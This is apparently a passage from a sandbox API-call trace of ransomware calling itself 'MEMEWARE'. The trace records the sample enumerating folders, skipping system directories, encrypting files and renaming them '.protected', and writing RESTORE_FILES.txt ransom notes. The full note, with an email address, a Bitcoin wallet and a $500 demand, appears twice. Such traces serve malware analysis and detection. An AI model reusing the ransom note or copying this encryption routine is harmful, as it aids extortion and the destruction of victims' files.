lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.401] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.401] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0071.402] CloseHandle (hObject=0xd4) returned 1 [0071.402] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.402] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.402] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\RESTORE_FILES.txt") returned 58 [0071.402] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.403] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.403] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.404] lstrlenA (lpString="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") returned 684 [0071.404] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.404] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.404] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.404] CloseHandle (hObject=0xb4) returned 1 [0071.404] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.404] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.404] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\RESTORE_FILES.txt") returned 53 [0071.404] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\search\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.404] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.405] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.405] lstrlenA (lpString="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") returned 684 [0071.405] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.405] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.405] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0071.405] CloseHandle (hObject=0xa4) returned 1 [0071.405] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.405] lstrcmpiW (lpString1="User Account Pictures", lpString2="Windows") returned -1 [0071.405] lstrcmpiW (lpString1="User Account Pictures", lpString2="Program Files") returned 1 [0071.405] lstrcmpiW (lpString1="User Account Pictures", lpString2="Program Files (x86)") returned 1 [0071.406] lstrcmpiW (lpString1="User Account Pictures", lpString2="$Recycle.bin") returned 1 [0071.406] lstrcmpiW (lpString1="User Account Pictures", lpString2="System Volume Information") returned 1 [0071.406] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned 50 [0071.406] lstrcmpW (lpString1="User Account Pictures", lpString2=".") returned 1 [0071.406] lstrcmpW (lpString1="User Account Pictures", lpString2="..") returned 1 [0071.406] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*") returned 52 [0071.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.406] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.406] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.406] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.406] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.406] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.406] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\.") returned 52 [0071.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.406] 
FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.406] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.406] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.406] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.406] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.406] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.406] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\..") returned 53 [0071.406] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.406] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.406] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="Windows") returned -1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="Program Files") returned -1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="Program Files (x86)") returned -1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="$Recycle.bin") returned 1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="System Volume Information") returned -1 [0071.406] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0071.406] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".protected") returned 0x0 [0071.406] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="RESTORE_FILES.txt") returned -1 [0071.406] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0071.406] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0071.406] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0071.407] StrStrW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".txt") returned 0x0 [0071.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0071.407] StrStrW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".rar") returned 0x0 [0071.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0071.407] StrStrW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".zip") returned 0x0 [0071.407] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x0, lpOverlapped=0x0) returned 1 [0071.407] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.407] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x0, lpOverlapped=0x0) returned 1 [0071.408] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.408] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, 
lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0071.409] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0071.409] CloseHandle (hObject=0xb4) returned 1 [0071.409] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.protected") returned 85 [0071.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.protected" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat.protected")) returned 1 [0071.410] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="Windows") returned -1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="Program Files") returned -1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="Program Files (x86)") returned -1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="$Recycle.bin") returned 1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="System Volume Information") returned -1 [0071.410] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures") returned 67 [0071.410] lstrcmpW (lpString1="Default Pictures", lpString2=".") returned 1 [0071.410] lstrcmpW (lpString1="Default Pictures", lpString2="..") returned 1 [0071.410] wnsprintfW (in: pszDest=0x4695e0, 
cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned 69 [0071.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.480] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.480] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.480] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.480] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.480] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.480] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\.") returned 69 [0071.480] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.480] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.480] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.480] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.480] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.480] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.480] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.480] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\..") returned 70 [0071.480] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.480] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.480] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Windows") returned 
-1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Program Files") returned 1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="Program Files (x86)") returned 1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="$Recycle.bin") returned 1 [0071.480] lstrcmpiW (lpString1="usertile10.bmp", lpString2="System Volume Information") returned 1 [0071.480] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 82 [0071.481] StrStrIW (lpFirst="usertile10.bmp", lpSrch=".protected") returned 0x0 [0071.481] lstrcmpW (lpString1="usertile10.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.481] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.481] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.481] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.483] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.483] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Windows") returned -1 [0071.483] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Program Files") returned 1 [0071.484] lstrcmpiW (lpString1="usertile11.bmp", lpString2="Program Files (x86)") returned 1 [0071.484] lstrcmpiW (lpString1="usertile11.bmp", lpString2="$Recycle.bin") returned 1 [0071.484] lstrcmpiW (lpString1="usertile11.bmp", lpString2="System Volume 
Information") returned 1 [0071.484] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 82 [0071.484] StrStrIW (lpFirst="usertile11.bmp", lpSrch=".protected") returned 0x0 [0071.484] lstrcmpW (lpString1="usertile11.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.484] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Windows") returned -1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Program Files") returned 1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="Program Files (x86)") returned 1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="$Recycle.bin") returned 1 [0071.484] lstrcmpiW (lpString1="usertile12.bmp", lpString2="System Volume Information") returned 1 [0071.484] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 82 [0071.484] StrStrIW (lpFirst="usertile12.bmp", lpSrch=".protected") returned 0x0 [0071.484] lstrcmpW 
(lpString1="usertile12.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.484] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.484] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.484] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.484] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Windows") returned -1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Program Files") returned 1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="Program Files (x86)") returned 1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="$Recycle.bin") returned 1 [0071.485] lstrcmpiW (lpString1="usertile13.bmp", lpString2="System Volume Information") returned 1 [0071.485] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned 82 [0071.485] StrStrIW (lpFirst="usertile13.bmp", lpSrch=".protected") returned 0x0 [0071.485] lstrcmpW (lpString1="usertile13.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.485] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.485] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, 
pdwDataLen=0x295eee4*=0x30) returned 1 [0071.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.485] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Windows") returned -1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Program Files") returned 1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="Program Files (x86)") returned 1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="$Recycle.bin") returned 1 [0071.485] lstrcmpiW (lpString1="usertile14.bmp", lpString2="System Volume Information") returned 1 [0071.485] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 82 [0071.485] StrStrIW (lpFirst="usertile14.bmp", lpSrch=".protected") returned 0x0 [0071.485] lstrcmpW (lpString1="usertile14.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.485] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.485] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.485] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.495] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Windows") returned -1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Program Files") returned 1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="Program Files (x86)") returned 1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="$Recycle.bin") returned 1 [0071.495] lstrcmpiW (lpString1="usertile15.bmp", lpString2="System Volume Information") returned 1 [0071.495] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 82 [0071.495] StrStrIW (lpFirst="usertile15.bmp", lpSrch=".protected") returned 0x0 [0071.495] lstrcmpW (lpString1="usertile15.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0071.495] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0071.496] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295eee4*=0x30) returned 1 [0071.496] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.497] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", lpString2="Windows") returned -1 [0071.497] lstrcmpiW (lpString1="usertile16.bmp", 
